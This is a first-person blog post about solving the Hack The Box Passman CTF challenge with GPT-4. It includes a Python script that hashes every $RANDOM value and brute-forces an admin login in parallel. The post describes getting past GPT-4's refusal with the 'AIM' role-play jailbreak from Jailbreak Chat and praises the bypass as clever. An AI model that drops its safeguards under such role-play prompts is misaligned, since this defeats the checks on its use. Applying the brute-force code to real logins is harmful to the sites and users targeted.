How I Solved the Passman CTF Challenge with GPT-4

Written by lukaszwronski | Published 2023/04/17
Tech Story Tags: cybersecurity | artificial-intelligence | chatgpt | web-development | python | capture-the-flag | hacking | ai-trends

TLDR: In Hack The Box's Cyber Apocalypse event, I tackled the Passman challenge, a web-based task to steal a password from an insecure site. After analyzing the app and discovering a peculiar password-generating function, I turned to GPT-4 for help. Although GPT-4's ethical safeguards initially hindered my efforts, I used Jailbreak Chat to bypass these restrictions and "trick" the AI into assisting me. With GPT-4's help, I brute-forced the admin's password, accessed the account, and obtained the challenge flag. GPT-4's potential in cybersecurity is immense, and it's poised to become a go-to tool for enthusiasts.

Welcome, fellow cyber adventurers! In this article, I'm going to take you on an exhilarating journey through the world of Cyber Apocalypse, a recent event hosted by the well-known Hack The Box. Cyber Apocalypse has taken the ethical hacking world by storm, becoming one of the most interesting events on the CTF calendar.


Today, I'll show you how my trusty new sidekick, GPT-4, played a pivotal role in helping me crack the enigmatic Passman challenge.

This article is a summary of my recent YouTube video. Watch it if you want to see GPT-4 in action and find out how it can become your secret weapon for conquering complex Capture The Flag challenges.

https://youtu.be/mT8Zsl8orM0

Prefer to read? Here is the story of the Passman challenge and GPT-4.

🔐 The Passman Challenge: A Doomsday Password Manager

Hack The Box, the renowned playground for cybersecurity enthusiasts, recently rolled out the red carpet for an event called Cyber Apocalypse. Amidst the plethora of challenges, the Passman challenge stood out—a web-based task of "easy" difficulty that dared participants to steal a master control password from a not-so-secure password manager website.

I dove headfirst into analyzing the app, but unfortunately, no apparent vulnerability revealed itself. So, I turned to the source code for clues. Lo and behold, I stumbled upon a peculiar function generating the "admin" password - a one-liner consisting of a chain of bash commands and a cryptic $RANDOM variable.

# Generate the admin password: md5-hash bash's $RANDOM value.
# md5sum prints "<hash>  -", so head -c 32 keeps only the 32 hex characters.
function genPass() {
    echo -n $RANDOM | md5sum | head -c 32
}

As per my usual modus operandi, I consulted explainshell.com to decipher this command chain. While it shed some light on the general idea, the true nature of $RANDOM remained shrouded in mystery…

🤖 Enter GPT: The AI Superhero

Of course, you've heard of GPT. It's the talk of the town - a versatile AI tool that can explain code snippets and generate code to solve problems. Seems like a perfect candidate for CTF tool of the year.

I decided to give explainshell.com a break and turned to GPT-4 for insights on the password-generating function. It didn't disappoint - it explained the function in exquisite detail and revealed that $RANDOM is, in fact, a bash built-in that expands to a random integer between 0 and 32,767.

Aha! A number range ripe for brute forcing!
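
To see just how small that search space is, here is a quick Python sketch of my own (not part of the challenge code) that reproduces genPass for every possible $RANDOM value:

import hashlib

# Mirror `echo -n $RANDOM | md5sum | head -c 32`: the md5 hex digest of
# the decimal string of an integer between 0 and 32767.
candidates = [hashlib.md5(str(n).encode()).hexdigest() for n in range(32768)]

print(len(candidates))   # 32768 possible admin passwords
print(candidates[:3])    # a peek at the first few candidates

Only 32,768 possibilities in total - exactly why an online brute force against the login form is feasible.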

Armed with Chrome DevTools, I gathered intel on the login procedure, including the target URL, parameter names, and HTTP headers.

And with GPT-4's uncanny ability to understand any techno-jargon we throw at it, I simply used the "copy as curl" button on a failed login request and asked it to conjure up a Python script for brute-forcing the password. But then, a plot twist...

🔓 Jailbreak Chat: Hacking the Chat to Hack the Challenge

You see, GPT-4 is programmed to be an ethical AI, which means it's reluctant to assist in shady activities. But fear not! CTFs are ethical hacking, and this is where Jailbreak Chat comes to the rescue.

Jailbreak Chat, a platform that has gained popularity among cybersecurity enthusiasts, offers an ingenious solution to a common obstacle faced by ethical hackers: the ethical safeguards built into AI tools like GPT-4.

While these safeguards are designed to prevent misuse of the AI's capabilities, they can sometimes hinder ethical hacking activities, such as Capture The Flag (CTF) challenges, where participants use hacking techniques for educational purposes.

This is where Jailbreak Chat shines—it lets us bypass GPT's ethical safeguards with clever prompts. It's a brilliant workaround that allows CTF players to harness the power of AI while respecting the tool's (a little exaggerated) commitment to ethical behavior…

The most popular prompt is AIM - a role-play in which GPT pretends to be an unfiltered, amoral chatbot "created by Niccolo Machiavelli." By "tricking" GPT-4 into becoming AIM, I finally unlocked its full potential!

🎉 A Nail-Biting Finish: Cracking the Passman Challenge

GPT-4's first exploit wasn't perfect - it had a bug that hindered execution. But after some back-and-forth, GPT-4 refined the script, squashed the bug, and, at my request, added parallel execution and progress reporting.
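
To give you a feel for what that final script did, here is a minimal sketch of the same approach - not GPT-4's exact code. The login URL, field names, and success check below are placeholders I've made up for illustration; the real values came straight from the "copy as curl" request captured in DevTools.

import hashlib
from concurrent.futures import ThreadPoolExecutor

import requests

# Placeholder endpoint and field names -- the real ones came from the
# "copy as curl" output of a failed login attempt.
LOGIN_URL = "http://TARGET_HOST/api/login"

def try_candidate(n):
    # Same transformation as genPass: md5 of the decimal string of n.
    password = hashlib.md5(str(n).encode()).hexdigest()
    resp = requests.post(LOGIN_URL, json={"username": "admin", "password": password})
    # Placeholder success check -- adapt it to the app's real response.
    if resp.ok and "invalid" not in resp.text.lower():
        return password
    return None

with ThreadPoolExecutor(max_workers=16) as pool:
    for attempt, hit in enumerate(pool.map(try_candidate, range(32768)), start=1):
        if attempt % 1000 == 0:
            print(f"{attempt} attempts so far...")   # simple progress reporting
        if hit:
            print(f"Admin password found: {hit}")
            break   # tasks already submitted will still drain on shutdown

The real script presumably also replayed the HTTP headers captured from the failed login request, which a login endpoint often requires.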

With the polished Python script in hand, I began brute-forcing the admin's password. The script ran like a charm, and the attempts piled up. Tension mounted as I approached 32k attempts without success. Was victory slipping away?

But then - Eureka! Just when all hope seemed lost, a glorious md5 string popped up on the screen. Victory was mine! The GPT-4-crafted script had brute-forced the admin's password, granting me access to the account and, ultimately, the coveted flag for the Passman challenge.

🚀 The Future of Cybersecurity: GPT-4 and Beyond

The triumph in the Passman challenge is a testament to the mind-blowing potential of AI chatbots like GPT-4 in the ever-evolving world of cybersecurity. As technology continues to advance at warp speed, we can expect even more powerful and helpful tools to emerge, making tasks like CTF challenges a thrilling and accessible experience for enthusiasts.

With its unparalleled versatility, GPT-4 is poised to become the new superhero of universal security tools, making many other tools feel like relics of the past. The future of cybersecurity is here, and it's time to embrace the power of AI with open arms… Finally!

And that, my friends, is the tale of how I cracked the Passman challenge with a little help from my AI sidekick. If you want to see the video write-up, you're welcome to visit the CTF School channel on YouTube.

Until our next adventure - happy hacking!


Written by lukaszwronski | Developer, hacker, father of two, wannabe rockstar, internet troll and meme enthusiast...